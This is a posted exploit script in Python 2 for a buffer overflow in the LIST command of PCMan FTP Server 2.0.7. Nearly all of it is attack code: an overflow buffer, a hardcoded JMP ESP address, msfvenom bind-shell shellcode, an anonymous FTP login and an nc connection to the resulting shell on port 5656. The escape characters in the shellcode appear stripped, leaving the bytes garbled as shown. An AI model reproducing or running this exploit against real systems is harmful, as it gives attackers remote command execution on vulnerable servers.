PCMan FTP Server 2.0.7 LIST Buffer Overflow
Posted on 11 November 2016
#!/usr/bin/env python #-*- coding: utf-8 -*- # Exploit Title: PCMan FTP Server 2.0.7 - 'LIST' Command Buffer Overflow # Date: 07/11/2016 # Author: Yunus YILDIRIM (Th3GundY) # Team: CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com # Website: http://yildirimyunus.com # Contact: yunusyildirim@protonmail.com # Tested on: Windows 7 Ultimate 32Bit import socket import sys import os import time def exploit(target, port): eip = "xC3x9CxB4x76" #SHELL32.dll 76B49CC3 JMP ESP # msfvenom -p windows/shell_bind_tcp LPORT=5656 -b 'x00x0ax0dxff' -f c shellcode = ("xdbxcfxd9x74x24xf4xbax9fxefx1bx27x5ex29xc9xb1" "x53x31x56x17x03x56x17x83x59xebxf9xd2x99x1cx7f" "x1cx61xddxe0x94x84xecx20xc2xcdx5fx91x80x83x53" "x5axc4x37xe7x2exc1x38x40x84x37x77x51xb5x04x16" "xd1xc4x58xf8xe8x06xadxf9x2dx7ax5cxabxe6xf0xf3" "x5bx82x4dxc8xd0xd8x40x48x05xa8x63x79x98xa2x3d" "x59x1bx66x36xd0x03x6bx73xaaxb8x5fx0fx2dx68xae" "xf0x82x55x1ex03xdax92x99xfcxa9xeaxd9x81xa9x29" "xa3x5dx3fxa9x03x15xe7x15xb5xfax7exdexb9xb7xf5" "xb8xddx46xd9xb3xdaxc3xdcx13x6bx97xfaxb7x37x43" "x62xeex9dx22x9bxf0x7dx9ax39x7bx93xcfx33x26xfc" "x3cx7exd8xfcx2ax09xabxcexf5xa1x23x63x7dx6cxb4" "x84x54xc8x2ax7bx57x29x63xb8x03x79x1bx69x2cx12" "xdbx96xf9x8fxd3x31x52xb2x1ex81x02x72xb0x6ax49" "x7dxefx8bx72x57x98x24x8fx58xb0xacx06xbexd6xdc" "x4ex68x4ex1fxb5xa1xe9x60x9fx99x9dx29xc9x1exa2" "xa9xdfx08x34x22x0cx8dx25x35x19xa5x32xa2xd7x24" "x71x52xe7x6cxe1xf7x7axebxf1x7ex67xa4xa6xd7x59" "xbdx22xcaxc0x17x50x17x94x50xd0xccx65x5exd9x81" "xd2x44xc9x5fxdaxc0xbdx0fx8dx9ex6bxf6x67x51xc5" "xa0xd4x3bx81x35x17xfcxd7x39x72x8ax37x8bx2bxcb" "x48x24xbcxdbx31x58x5cx23xe8xd8x6cx6exb0x49xe5" "x37x21xc8x68xc8x9cx0fx95x4bx14xf0x62x53x5dxf5" "x2fxd3x8ex87x20xb6xb0x34x40x93") buffer = 'A'*2006 + eip + "x90"*21 + shellcode try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target,port)) s.recv(1024) print "[+] Connect to %s on port %d" % (target,port) except Exception, e: print "[-] Could not create socket", e.message sys.exit(0) try: s.send('USER anonymous ') s.recv(1024) s.send('PASS CT-Zer0 ') s.recv(1024) s.send('LIST ' + buffer + ' ') print "[+] Exploit Sent Successfully" s.close() print '[+] You got bind shell on port 5656 ' time.sleep(2) os.system('nc ' + target + ' 5656') except: print "[-] Could not connect to target" def banner(): banner = " " banner +=" aaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaa aaaaaaa " banner +=" aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa " banner +=" aaa aaaaaaaaa aaaaa aaaaaa aaaaaaaaaaaaaaaaa " banner +=" aaa aaaaaaaaaaaaaa aaaaaa aaaaaaaaaaaaaaaaa " banner +=" aaaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaaaaaaaaaaa " banner +=" aaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaa aaaaaaa " banner +=" " print banner if len(sys.argv) == 3: banner() target = sys.argv[1] port = int(sys.argv[2]) exploit(target, port) else: banner() print "[*] Usage: python %s <IP> <Port> " % sys.argv[0] sys.exit(0)
